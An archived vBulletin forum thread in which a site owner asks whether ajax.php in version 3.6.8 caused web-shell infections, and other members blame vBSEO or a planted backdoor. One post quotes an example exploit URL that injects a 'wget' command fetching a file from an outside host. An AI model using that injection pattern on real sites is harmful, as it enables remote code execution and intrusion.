Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 Programming Discussions
Reload this Page is ajax.php on vB 3.6.8 causing my security hole and malicious software infections?
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 07-19-2012, 01:10 AM
z0diac z0diac is offline
 
Join Date: Dec 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default is ajax.php on vB 3.6.8 causing my security hole and malicious software infections?
I've been getting infected with malicious software daily for the last week. I've hired the good guys at Total Server Solutions and they have pointed toward ajax.php being insecure.

Is there an updated version of JUST that file that I can use with vB 3.6.8 ? I cannot do a full vB upgrade due to a lot of php file edits that have been done to create some custom stuff.

Are there any known security holes in ajax.php on my version of vB? (The !C99madShell v. 2.0 madnet edition! hack was put on)

NEED HELP with ajax.php and what I can do to it so this doesn't happen again!
Reply With Quote
  #2  
Old 07-19-2012, 01:34 AM
Zachery's Avatar
Zachery Zachery is offline
 
Join Date: Jul 2002
Location: Ontario, Canada
Posts: 11,440
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Not out of the box. your third party addons, or old version of vBulletin may be allowing hackers access. Its also possible they got in completely unrelated to your vb site and hit your site as they were passing by.
Reply With Quote
  #3  
Old 07-19-2012, 02:10 AM
z0diac z0diac is offline
 
Join Date: Dec 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Could updating just the ajax.php file to a more recent version help secure it?
Reply With Quote
  #4  
Old 07-19-2012, 05:11 AM
Simon Lloyd's Avatar
Simon Lloyd Simon Lloyd is offline
 
Join Date: Aug 2008
Location: Manchester
Posts: 3,481
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
It definitely wont be the ajax file, it's usually due to an add on poorly coded allowing access, if you have all the security patches for vb up to date for your installation then it will be from something else, do you have vbseo?

Check these too:
https://www.vbulletin.com/forum/entr...Forums-(Part-1)
https://www.vbulletin.com/forum/entr...Forums-(Part-2)
https://www.vbulletin.com/docs/html/securing_vbulletin
https://vborg.vbsupport.ru/showthread.php?t=193930
Reply With Quote
  #5  
Old 07-19-2012, 02:47 PM
z0diac z0diac is offline
 
Join Date: Dec 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Simon Lloyd View Post
It definitely wont be the ajax file, it's usually due to an add on poorly coded allowing access, if you have all the security patches for vb up to date for your installation then it will be from something else, do you have vbseo?

Check these too:
https://www.vbulletin.com/forum/entr...Forums-(Part-1)
https://www.vbulletin.com/forum/entr...Forums-(Part-2)
https://www.vbulletin.com/docs/html/securing_vbulletin
https://vborg.vbsupport.ru/showthread.php?t=193930
Yes I have VBSEO although I cant' even remember what it does.

It was definitely the ajax.php file in 3.6.8 - the guys at Total Server Solutions tried a test of the exploit on it and it worked. They put on a vb 4.x ajax.php file and tried the exploit, and it didn't work.

Exploit in 3.6.8 ajax.php (example):
Code:
http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png
Reply With Quote
  #6  
Old 07-19-2012, 03:22 PM
Simon Lloyd's Avatar
Simon Lloyd Simon Lloyd is offline
 
Join Date: Aug 2008
Location: Manchester
Posts: 3,481
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
The xploit may well have worked on taht php file but unless your vbseo is patched up to date thats almost certainly where it was injected, there's been many threads on it, go to vbseo and check your version against the latest, they have a tool you can download to check.
Reply With Quote
  #7  
Old 07-19-2012, 03:32 PM
kh99 kh99 is offline
 
Join Date: Aug 2009
Location: Maine
Posts: 13,185
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I think you might want to check your plugins and see if you have any that use hook ajax_start or ajax_complete - the ajax.php file itself doesn't use the global parameter so something else must have been processing the command (I suppose it could have to do with vbseo - I don't know how that exploit worked).

Edit: BTW, here's an older thread discussing the issue: www.vbulletin.org/forum/showthread.php?t=202532 ...and if what was said in that thread is true, ajax.php isn't the original problem, it's just where a "back door" was added.
Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 03:53 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04661 seconds
  • Memory Usage 2,219KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (7)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete